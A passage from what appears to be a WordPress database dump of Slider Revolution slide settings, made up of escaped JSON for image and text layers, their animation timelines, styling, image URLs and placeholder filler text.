,\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":17,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":17,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"bottom\"},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"-20deg\",\"rotationY\":\"-20deg\",\"rotationZ\":\"0deg\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"Power3.easeOut\",\"speed\":1500,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1480,\"start\":9000,\"startRelative\":7500,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"15\":{\"text\":\"Image 15\",\"alias\":\"Image 15\",\"uid\":15,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/recept-11.png\",\"imageId\":4590},\"size\":{\"width\":{\"d\":{\"v\":\"528px\",\"e\":true},\"n\":{\"v\":\"428px\",\"e\":true},\"t\":{\"v\":\"344px\",\"e\":true},\"m\":{\"v\":\"344px\"}},\"height\":{\"d\":{\"v\":\"629px\",\"e\":true},\"n\":{\"v\":\"510px\",\"e\":true},\"t\":{\"v\":\"410px\",\"e\":true},\"m\":{\"v\":\"410px\"}},\"originalWidth\":552,\"originalHeight\":657,\"aspectRatio\":{\"d\":{\"v\":0.840182648401826437378758782870136201381683349609375},\"n\":{\"v\":0.840182648401826437378758782870136201381683349609375},\"t\":{\"v\":0.840182648401826437378758782870136201381683349609375},\"m\":{\"v\":0.840182648401826437378758782870136201381683349609375}}},\"position\":{\"x\":{\"d\":{\"v\":\"80px\",\"e\":true},\"n\":{\"v\":\"208px\",\"e\":true},\"t\":{\"v\":\"-6px\",\"e\":true},\"m\":{\"v\":\"433px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"145px\",\"e\":true},\"n\":{\"v\":\"102px\",\"e\":true},\"t\":{\"v\":\"155px\",\"e\":true},\"m\":{\"v\":\"124px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\"}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\"}},\"zIndex\":18,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":18,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1340,\"start\":9000,\"startRelative\":8100,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"action\":[{\"tooltip_event\":\"click\",\"action\":\"link\",\"image_link\":\"http:\\/\\/succulents.select-themes.com\\/summer-booze\\/\",\"link_open_in\":\"_blank\",\"link_follow\":\"follow\",\"jump_to_slide\":\"\",\"scrollunder_offset\":\"\",\"action_easing\":\"Linear.easeNone\",\"action_speed\":\"\",\"actioncallback\":\"\",\"layer_target\":\"backgroundvideo\",\"link_type\":\"a\",\"action_delay\":\"\",\"toggle_layer_type\":\"visible\",\"toggle_class\":\"\"}],\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"17\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":17,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\",\"e\":true},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-541px\",\"e\":true},\"n\":{\"v\":\"-419px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"-59px\",\"e\":true},\"n\":{\"v\":\"126px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true}},\"zIndex\":19,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":19,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\",\"e\":true},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\",\"e\":true},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\",\"e\":true},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"},\"18\":{\"text\":\"It is a long established fact that a reader will be distracted by the readable content of a page when looking at its layout and web page.\",\"alias\":\"It is a long establi...\",\"uid\":18,\"size\":{\"width\":{\"d\":{\"v\":\"348px\",\"e\":true},\"n\":{\"v\":\"348px\"},\"t\":{\"v\":\"348px\",\"e\":true},\"m\":{\"v\":\"348px\"}},\"height\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"originalWidth\":\"348px\"},\"position\":{\"x\":{\"d\":{\"v\":\"-541px\",\"e\":true},\"n\":{\"v\":\"-418px\",\"e\":true},\"t\":{\"v\":\"245px\",\"e\":true},\"m\":{\"v\":\"245px\"}},\"y\":{\"d\":{\"v\":\"-59px\",\"e\":true},\"n\":{\"v\":\"273px\",\"e\":true},\"t\":{\"v\":\"322px\",\"e\":true},\"m\":{\"v\":\"322px\"}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\"},\"t\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\"},\"t\":{\"e\":true}},\"zIndex\":20,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":20,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":0},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"start\":0},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":9000,\"startRelative\":8700,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"fontFamily\":\"PT Sans\",\"fontSize\":{\"d\":{\"v\":\"16px\",\"e\":true},\"n\":{\"v\":\"16px\"},\"t\":{\"v\":\"16px\",\"e\":true},\"m\":{\"v\":\"16px\"}},\"fontWeight\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"t\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"25px\",\"e\":true},\"n\":{\"v\":\"25px\"},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"v\":\"normal\",\"e\":true},\"n\":{\"v\":\"normal\"},\"t\":{\"v\":\"normal\",\"e\":true},\"m\":{\"v\":\"normal\"}},\"svg\":{\"color\":{\"d\":{\"v\":\"#9e9e9e\",\"e\":true},\"n\":{\"v\":\"#9e9e9e\"},\"t\":{\"v\":\"#9e9e9e\",\"e\":true},\"m\":{\"v\":\"#9e9e9e\"}}}},\"hover\":{\"color\":\"#000000\",\"borderRadius\":{\"v\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"u\":\"px\"},\"borderWidth\":[\"0px\",\"0px\",\"0px\",\"0px\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"svg\":{\"color\":\"#000000\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"text\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(2,2,1,'{\"title\":\"Slide\",\"bg\":{\"type\":\"image\",\"color\":\"#E7E7E7\",\"image\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slide1-background1.jpg\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[1000]},\"effects\":{\"parallax\":\"9\"}}','{\"2\":{\"text\":\"Image 2\",\"alias\":\"Image 2\",\"uid\":2,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h1-slider1-graphic1.png\",\"imageId\":1043},\"size\":{\"width\":{\"d\":{\"v\":\"65px\",\"e\":true},\"n\":{\"v\":\"65px\",\"e\":true},\"t\":{\"v\":\"65px\"},\"m\":{\"v\":\"65px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"52px\",\"e\":true},\"n\":{\"v\":\"52px\",\"e\":true},\"t\":{\"v\":\"52px\"},\"m\":{\"v\":\"52px\",\"e\":true}},\"originalWidth\":65,\"originalHeight\":52,\"aspectRatio\":{\"d\":{\"v\":1.25},\"n\":{\"v\":1.25},\"t\":{\"v\":1.25},\"m\":{\"v\":1.25}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"v\":\"4px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"159px\",\"e\":true},\"n\":{\"v\":\"-139px\",\"e\":true},\"t\":{\"v\":\"-139px\"},\"m\":{\"v\":\"-175px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":200},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 